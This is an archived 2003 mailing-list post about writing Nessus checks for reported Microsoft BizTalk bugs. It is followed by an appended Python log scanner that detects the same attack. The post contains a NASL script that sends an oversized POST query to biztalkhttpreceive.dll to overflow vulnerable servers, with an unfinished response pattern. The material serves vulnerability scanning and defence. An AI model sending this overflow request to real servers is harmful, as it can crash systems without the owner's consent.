Anyone working on Cesar's biztalk bugs

From: John Lampe (j_lampeat_private)
Date: Thu May 15 2003 - 22:04:07 PDT


Is anyone working on Cesar's BizTalk bugs?  According to his Bugtraq post,
the following should overflow a vulnerable BizTalk server... Does anyone
have a BizTalk server to test against?

# Build the oversized POST request: a 250-byte junk query string appended to
# the BizTalk HTTP receive DLL path. The User-Agent header is kept on one
# line so the request is well-formed HTTP.
req = string("POST /Site/biztalkhttpreceive.dll?", crap(250), " HTTP/1.0\r\n");
req = req + string("Accept: */*", "\r\n", "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)", "\r\n");
req = req + string("Host: ", get_host_ip(), "\r\n");
req = req + string("Content-Length: 6", "\r\n", "Proxy-Connection: Keep-Alive", "\r\n", "Pragma: no-cache", "\r\n\r\n");
req = req + string("NESSUS\r\n\r\n");

port = 80;
if (!get_port_state(port)) exit(0);
soc = open_sock_tcp(port);
if (soc)
{
  send(socket:soc, data:req);
  r = recv(socket:soc, length:2048);
  close(soc);
  # display(r);

  # Placeholder pattern from the original post: the response that identifies a
  # vulnerable server still has to be filled in once someone tests this.
  if (egrep(pattern:".*something_or_other*", string:r))
    security_hole(port:port);
}

He also showed some vulnerable scripts (SQL injection) which would be really
simple to write.  A "grep -i biztalk /usr/local/lib/nessus/plugins/*.nasl"
reveals nothing...


John W. Lampe
https://f00dikator.aceryder.com/
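A defender-side complement to the check above, added here and not part of the original post or of Nessus: a small scanner over IIS-style web server log lines that flags requests to biztalkhttpreceive.dll carrying an unusually long query string, which is exactly what the probe above sends. The log lines, the column layout and the 200-character threshold are all constructed assumptions for this example.

```python
import re

# Constructed W3C-style IIS log lines (not from the original post):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status; "-" is an empty query.
SAMPLE_LOG = """\
2003-05-15 22:04:07 192.0.2.10 POST /Site/biztalkhttpreceive.dll - 200
2003-05-15 22:04:08 192.0.2.10 POST /Site/biztalkhttpreceive.dll {long} 500
2003-05-15 22:04:09 192.0.2.11 GET /Site/default.htm - 200
2003-05-15 22:04:10 192.0.2.12 POST /Site/biztalkhttpreceive.dll short=1 200
""".format(long="X" * 250)

LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)

RECEIVE_DLL = "biztalkhttpreceive.dll"


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the layout."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["query"] = "" if entry["query"] == "-" else entry["query"]
    return entry


def is_suspicious(entry, max_query_len=200):
    """True for a request to the BizTalk receive DLL whose query string exceeds the assumed threshold."""
    hits_dll = entry["stem"].lower().endswith(RECEIVE_DLL)
    return hits_dll and len(entry["query"]) > max_query_len


def scan_log(text, max_query_len=200):
    """Return (client ip, time, query length, status) for every suspicious request in the log text."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry and is_suspicious(entry, max_query_len):
            hits.append((entry["ip"], entry["time"], len(entry["query"]), entry["status"]))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("long query to %s from %s at %s (%d bytes, status %s)" % ((RECEIVE_DLL,) + hit))
```

A 500 status on such a request is worth correlating with the server's application event log, since a crashed receive DLL is one visible outcome of the overflow the post describes.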



This archive was generated by hypermail 2b30 : Thu May 15 2003 - 21:58:05 PDT